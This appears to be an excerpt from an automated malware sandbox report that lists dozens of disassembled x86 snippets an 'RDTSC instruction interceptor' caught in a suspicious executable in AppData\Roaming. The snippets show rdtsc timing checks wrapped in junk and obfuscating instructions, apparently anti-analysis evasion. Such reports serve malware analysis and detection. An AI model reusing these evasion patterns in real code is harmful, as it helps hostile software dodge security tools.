Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE04D6 second address: 4CE052E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov dx, si 0x00000012 pushad 0x00000013 call 00007F95FD07A05Eh 0x00000018 pop eax 0x00000019 push edi 0x0000001a pop esi 0x0000001b popad 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f jmp 00007F95FD07A05Dh 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F95FD07A068h 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE052E second address: 4CE0532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0532 second address: 4CE0538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0DA9 second address: 4CF0E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD7D899Fh 0x00000009 jmp 00007F95FD7D89A3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F95FD7D89A8h 0x00000015 adc si, 7978h 0x0000001a jmp 00007F95FD7D899Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 pushad 0x00000025 mov cx, bx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b mov bx, 313Eh 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007F95FD7D89A5h 0x00000037 xor ch, FFFFFFC6h 0x0000003a jmp 00007F95FD7D89A1h 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D000FF second address: 4D00118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F95FD07A063h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D00118 second address: 4D0017D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F95FD7D89A0h 0x0000000f push eax 0x00000010 jmp 00007F95FD7D899Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushad 0x00000018 mov ah, 9Bh 0x0000001a mov di, ECB2h 0x0000001e popad 0x0000001f mov esi, edx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F95FD7D89A5h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bh, 77h 0x0000002f movzx eax, dx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2073A second address: 4D2073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2073E second address: 4D20744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20744 second address: 4D207A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A064h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F95FD07A05Eh 0x00000010 mov ax, 3041h 0x00000014 pop eax 0x00000015 push edx 0x00000016 mov bh, ch 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F95FD07A065h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F95FD07A05Eh 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D207A0 second address: 4D2084C instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a movzx ecx, bx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F95FD7D899Ch 0x0000001b and ax, 0248h 0x00000020 jmp 00007F95FD7D899Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp], ecx 0x0000002a jmp 00007F95FD7D89A6h 0x0000002f mov eax, dword ptr [76FA65FCh] 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F95FD7D899Eh 0x0000003b sbb ax, 27D8h 0x00000040 jmp 00007F95FD7D899Bh 0x00000045 popfd 0x00000046 call 00007F95FD7D89A8h 0x0000004b mov di, cx 0x0000004e pop esi 0x0000004f popad 0x00000050 test eax, eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F95FD7D89A8h 0x00000059 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2084C second address: 4D2085E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2085E second address: 4D20888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F966F9DBA96h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx eax, bx 0x00000014 jmp 00007F95FD7D89A5h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20888 second address: 4D208D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, DABEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c jmp 00007F95FD07A065h 0x00000011 xor eax, dword ptr [ebp+08h] 0x00000014 jmp 00007F95FD07A067h 0x00000019 and ecx, 1Fh 0x0000001c pushad 0x0000001d mov bx, si 0x00000020 push eax 0x00000021 push edx 0x00000022 mov si, C83Dh 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D208D0 second address: 4D2096B instructions: 0x00000000 rdtsc 0x00000002 call 00007F95FD7D899Ah 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b ror eax, cl 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 mov si, F9CFh 0x00000015 popad 0x00000016 leave 0x00000017 pushad 0x00000018 push eax 0x00000019 pushfd 0x0000001a jmp 00007F95FD7D89A7h 0x0000001f jmp 00007F95FD7D89A3h 0x00000024 popfd 0x00000025 pop ecx 0x00000026 call 00007F95FD7D89A9h 0x0000002b mov esi, 05F99F87h 0x00000030 pop eax 0x00000031 popad 0x00000032 retn 0004h 0x00000035 nop 0x00000036 mov esi, eax 0x00000038 lea eax, dword ptr [ebp-08h] 0x0000003b xor esi, dword ptr [003C2014h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push eax 0x00000044 lea eax, dword ptr [ebp-10h] 0x00000047 push eax 0x00000048 call 00007F96021792E4h 0x0000004d push FFFFFFFEh 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F95FD7D89A9h 0x00000056 jmp 00007F95FD7D899Bh 0x0000005b popfd 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D2096B second address: 4D209A9 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jmp 00007F95FD07A05Eh 0x0000000d ret 0x0000000e nop 0x0000000f push eax 0x00000010 call 00007F9601A1A9E1h 0x00000015 mov edi, edi 0x00000017 jmp 00007F95FD07A060h 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F95FD07A05Dh 0x00000025 mov di, si 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D209A9 second address: 4D209AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D209AF second address: 4D209B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D209B3 second address: 4D209EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F95FD7D89A9h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov di, 32DAh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D209EB second address: 4D20A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A067h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20A06 second address: 4D20A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20A16 second address: 4D20A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20A1A second address: 4D20A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0060 second address: 4CD00D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A066h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F95FD07A060h 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007F95FD07A060h 0x00000018 xchg eax, ecx 0x00000019 pushad 0x0000001a jmp 00007F95FD07A05Eh 0x0000001f mov di, si 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F95FD07A069h 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD00D1 second address: 4CD00D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD00D7 second address: 4CD00DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD00DD second address: 4CD00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD00E1 second address: 4CD0121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c pushfd 0x0000000d jmp 00007F95FD07A05Ch 0x00000012 jmp 00007F95FD07A065h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F95FD07A05Dh 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0121 second address: 4CD014D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F95FD7D89A1h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD014D second address: 4CD0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0155 second address: 4CD0167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 2211h 0x00000008 popad 0x00000009 popad 0x0000000a mov ebx, dword ptr [ebp+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0167 second address: 4CD017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F95FD07A05Fh 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD017C second address: 4CD019C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD019C second address: 4CD01D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F95FD07A063h 0x0000000a xor cx, 120Eh 0x0000000f jmp 00007F95FD07A069h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD01D4 second address: 4CD01FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F95FD7D89A7h 0x00000008 pop esi 0x00000009 mov di, 7ECCh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD01FD second address: 4CD0201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0201 second address: 4CD0218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0218 second address: 4CD02A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD07A05Fh 0x00000009 sub eax, 571E7A2Eh 0x0000000f jmp 00007F95FD07A069h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F95FD07A060h 0x0000001b and cx, 57A8h 0x00000020 jmp 00007F95FD07A05Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, esi 0x0000002a jmp 00007F95FD07A066h 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F95FD07A067h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD02A3 second address: 4CD0306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD7D899Fh 0x00000009 jmp 00007F95FD7D89A3h 0x0000000e popfd 0x0000000f call 00007F95FD7D89A8h 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 jmp 00007F95FD7D899Eh 0x0000001e mov dword ptr [esp], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F95FD7D899Ah 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0306 second address: 4CD030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD030A second address: 4CD0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0310 second address: 4CD0321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0321 second address: 4CD0325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0325 second address: 4CD0335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0335 second address: 4CD0339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0339 second address: 4CD034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD034F second address: 4CD0361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0361 second address: 4CD0365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD0365 second address: 4CD037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F966FA26C3Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, 059A663Ah 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD037C second address: 4CD03AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 31D8301Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 pushad 0x00000013 call 00007F95FD07A065h 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d movsx edi, ax 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD03AC second address: 4CD03E3 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F966FA26C0Dh 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F95FD7D899Eh 0x00000015 add ax, 1D08h 0x0000001a jmp 00007F95FD7D899Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov edx, dword ptr [esi+44h] 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CD03E3 second address: 4CD045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F95FD07A05Ch 0x0000000a add cx, BF68h 0x0000000f jmp 00007F95FD07A05Bh 0x00000014 popfd 0x00000015 popad 0x00000016 mov ch, F1h 0x00000018 popad 0x00000019 or edx, dword ptr [ebp+0Ch] 0x0000001c jmp 00007F95FD07A05Bh 0x00000021 test edx, 61000000h 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F95FD07A05Bh 0x0000002e and si, 6B5Eh 0x00000033 jmp 00007F95FD07A069h 0x00000038 popfd 0x00000039 popad 0x0000003a jne 00007F966F2C8294h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F95FD07A05Ah 0x00000048 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC077F second address: 4CC07A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD7D899Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC07A3 second address: 4CC07E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD07A061h 0x00000009 xor cx, 6486h 0x0000000e jmp 00007F95FD07A061h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov ebx, 7BB43B0Eh 0x0000001e mov edx, 5CFCFA1Ah 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov cx, bx 0x0000002c rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC07E7 second address: 4CC07FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, edi 0x00000008 popad 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dx, 9470h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC07FA second address: 4CC083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F95FD07A064h 0x0000000a and si, 5CB8h 0x0000000f jmp 00007F95FD07A05Bh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F95FD07A065h 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC083D second address: 4CC0843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0843 second address: 4CC0847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0847 second address: 4CC0864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95FD7D89A0h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0864 second address: 4CC0868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0868 second address: 4CC086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC086E second address: 4CC0906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD07A05Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f mov al, F6h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F95FD07A05Eh 0x0000001a add ax, 2B08h 0x0000001f jmp 00007F95FD07A05Bh 0x00000024 popfd 0x00000025 mov dx, ax 0x00000028 popad 0x00000029 mov dword ptr [esp], esi 0x0000002c pushad 0x0000002d jmp 00007F95FD07A060h 0x00000032 popad 0x00000033 mov esi, dword ptr [ebp+08h] 0x00000036 jmp 00007F95FD07A067h 0x0000003b sub ebx, ebx 0x0000003d jmp 00007F95FD07A05Fh 0x00000042 test esi, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F95FD07A065h 0x0000004b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0906 second address: 4CC090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC090C second address: 4CC0910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0910 second address: 4CC0926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F966FA2E40Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov bl, ah 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0926 second address: 4CC096E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD07A066h 0x00000009 adc ah, FFFFFFB8h 0x0000000c jmp 00007F95FD07A05Bh 0x00000011 popfd 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F95FD07A061h 0x00000025 rdtsc
